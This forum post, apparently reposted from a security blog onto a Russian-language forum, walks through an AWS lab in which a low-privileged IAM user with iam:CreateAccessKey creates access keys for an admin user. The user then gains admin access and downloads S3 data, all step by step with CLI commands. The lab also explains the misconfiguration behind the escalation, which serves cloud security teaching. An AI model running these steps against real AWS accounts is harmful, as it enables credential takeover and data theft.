• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Статья AWS: IAM CreateAccessKey Privilege Escalation

stihl

Moderator
Регистрация
09.02.2012
Сообщения
1,311
Розыгрыши
0
Реакции
591
Deposit
0.228 BTC
stihl не предоставил(а) никакой дополнительной информации.
While cloud providers are responsible for securing the cloud infrastructure, customers are accountable for securing everything they deploy in the cloud, including proper configurations. In this lab, we will show how a low-privileged IAM user can misuse the iam:CreateAccessKey permission where user is allowed to create access keys for another IAM user who can take on elevated roles, leading to privilege escalation. This setup highlights a common misconfiguration in IAM policies that can pose serious security risks.

Table Of Contents​

About iam:CreateAccessKey

Lab Setup and Prerequisite

Part 1: IAM Lab Setup

  • Creating High Privileged IAM User
  • Creating Low Privileged IAM User
Part 2: Enumeration and Exploitation

  • Prerequisite for Pentest
  • Configuring AWS CLI With Low Privileged User Credentials
  • Enumerating IAM Users with AWS CLI
  • IAM CreateAccessKey Exploitation
Analysis

Recommendations

Conclusion

About iam:CreateAccessKey​

The Для просмотра ссылки Войди или Зарегистрируйся API action allows you to manage AWS account root user credentials. In AWS, “abusing the iam:CreateAccessKey permission” refers to a privilege escalation technique where a user with limited permissions creates access keys for another IAM user, typically one with higher privileges and then uses those keys to gain unauthorized access.

The API action CreateAccessKey generates a new access key ID and secret for a specified IAM user or whoever is making the request.

Lab Setup and Prerequisites​

  1. An AWS Account
  2. VM Kali Linux
If you are new to AWS platform, it is recommended to go through the AWS Lab setup Для просмотра ссылки Войди или Зарегистрируйся,

Part 1: IAM Lab Setup​

Here are the instructions for setting up the environment. We will access the AWS console and configure the AWS Command Line Interface (CLI) along with creation of IAM users and attaching Для просмотра ссылки Войди или Зарегистрируйся policy.

Users:

Igt_admin: High-level access

Igt_raj: Basic access but with risky permissions

Policy name:

Vuln_create_access_key: Lets user create access keys

Creating High Privileged IAM User​

Navigate to IAM > Users, then click Create user to set up a new IAM identity.

  1. Create the user a User name (e.g. lgt_admin) and press Next to set the permission.


  1. Set permission to configure lgt_admin user’s permissions as Attach policies directly from the Permissions options.
  2. Select AdministratorAccess under Permission Policies section.
AdministratorAccess – In AWS, the AdministratorAccess policy is a built-in policy that gives full access to all services and resources in the account when attached to a user, group, or role. Thus, making it the “high-privileged” target for the lab.



Creating low Privileged IAM User​

  1. Create another IAM user (e.g. lgt_raj) and press.


  1. Set permission to configure lgt_admin user’s permissions as Attach policies directly from the Permissions options.
  2. Now, select the Create Policy.


  1. Write a custom policy to provide certain action to IAM user Igt_raj.
  • iam:CreateAccessKey – Allows creation of a new access key (AKIA/Secret) for a specified IAM user.
  • iam:ListUsers – Lists all IAM users in the AWS account.
  • iam:ListAttachedUserPolicies – Lists all managed policies attached to a specific IAM user.
  • iam:GetUser – Retrieves details about a specified IAM user (or the caller if none specified).
  • iam:GetPolicy – Retrieves metadata about a managed IAM policy.
  • iam:GetPolicyVersion – Retrieves a specific version document of an IAM managed policy.
Код: 
{

              "Version": "2012-10-17",

              "Statement": [

                             {

                                           "Effect": "Allow",

                                           "Action": [

                                                          "iam:CreateAccessKey",

                                                          "iam:ListUsers",

                                                          "iam:ListAttachedUserPolicies",

                                                          "iam:GetUser",

                                                          "iam:GetPolicy",

                                                          "iam:GetPolicyVersion"

                                           ],

                                           "Resource": "*"

                             }

              ]

}

This is how the policy looks like after adding certain actions.


  1. Provide policy details such as policy name (Vuln_create_access_key) and description as shown in the given screenshot.

  1. Map the policy “Vuln_create_access_key” for user Igt_raj .

  1. Lastly, let’s “Create access key” for Igt_raj. Select “Command Line Interface (CLI)” as the use case.


Part 2: IAM Enumeration & Exploitation​

Why might the CreateAccesskey be used for another IAM user?

It is sometimes used to let a trusted user generate access keys for another IAM user in cases like

  1. Emergency access – when the admin is unavailable
  2. Break-glass situations – for urgent recovery tasks
  3. Automation in scripts that manage or rotate keys
Note:

Letting users create access keys for others can lead to privilege escalation, is hard to track, and violates least privilege. It should be use with extreme caution.

“We recommend relying on temporary credentials rather than creating long-term credentials such as access keys. Instead, use roles for temporary access.” Для просмотра ссылки Войди или Зарегистрируйся

Prerequisite for Pentest​

  • Pentest Machine: Kali Linux
  • Test Credentials: Igt_raj user’s Access Key + Secret + Region
  • Tools: AWS-Cli (sudo apt install awscli)

Configuring AWS CLI With Low Privileged User Credentials​

Configure AWS CLI profile with the Igt_raj credentials.

It prompts to enter AWS Access Key ID, AWS Secret Access Key, default region.

Код: 
aws configure set profile.Igt_raj.aws_access_key_id <rajUser_AccessKey>
aws configure set profile.Igt_raj.aws_secret_access_key <rajUser_SecretKey>
aws configure set profile.Igt_raj.region us-east-1



Running the get-caller-identity command returns the profile details like user id and Arn. Pay close attention to the ARN, as it uniquely identifies the resource.

Код: 
aws sts get-caller-identity --profile Igt_raj



Enumerating IAM Users with AWS CLI​

Let’s begin the real game. Run the following command. It lists all IAM users in the AWS account.

Код: 
aws iam list-users --profile Igt_raj

Next, identify the attached policies. The following command shows that user Igt_raj has the CreateAccessKey policy attached, indicating a possible privilege escalation risk.

Код: 
aws iam list-attached-user-policies --user-name Igt_raj --profile Igt_raj



Use the following command to fetch policy metadata, including its ARN and default version ID (v2), indicating that the policy was updated and v2 should be analyzed for any analysis or exploitation.

Код: 
aws iam get-policy --policy-arn arn:aws:iam::513869214449:policy/Vuln_create_access_key --profile Igt_raj



Running this command will show all the actions, effects and actual contents of policy.

Код: 
aws iam get-policy-version --policy-arn arn:aws:iam::513869214449:policy/Vuln_create_access_key --version-id v2 --profile Igt_raj



IAM CreateAccessKey Exploitation​

Here, we will try to run the command.

Код: 
aws s3 ls --profile Igt_raj

The action will be denied as no identity-based policy can do it.



Next, is the real exploitation of the CreateAccessKey policy. It requests the long-term credentials for the Igt_admin user.

Код: 
aws iam create-access-key --user-name Igt_admin –profile Igt_raj



Now, we will setup our AWS CLI credentials according to the above output.

Код: 
aws configure

Again, use this command to check if its working and it’s a success this time.

Код: 
aws s3 ls

List your bucket and here you can see text files in output

Код: 
aws s3 ls s3://igt-bucket

Download the text file

Код: 
aws s3 cp s3://igt-bucket/proof.txt file_admin.txt

Display the contents of file

Код: 
cat file_admin.txt



Analysis​

This lab highlights a common security gap, overly permissive IAM policies that lack proper restrictions. Such setups can easily be exploited if not carefully reviewed and monitored. The escalation vector was:

Igt_raj → list-users / get-user → have CreateAccessKey Permission → create-access-key on Admin User → Gets Admin Credentials → Configures CLI → Admin Access Gained

Such misconfigurations can occur due to:

  • Overly permissive trust policies without resource restrictions (“Resource”: “*”)
  • Improper role separation
  • Violates Least Privilege Principle


Для просмотра ссылки Войди или Зарегистрируйся
 
Войдите или зарегистрируйтесь для ответа.
Activity
So far there's no one here
Меню
Вход
Регистрация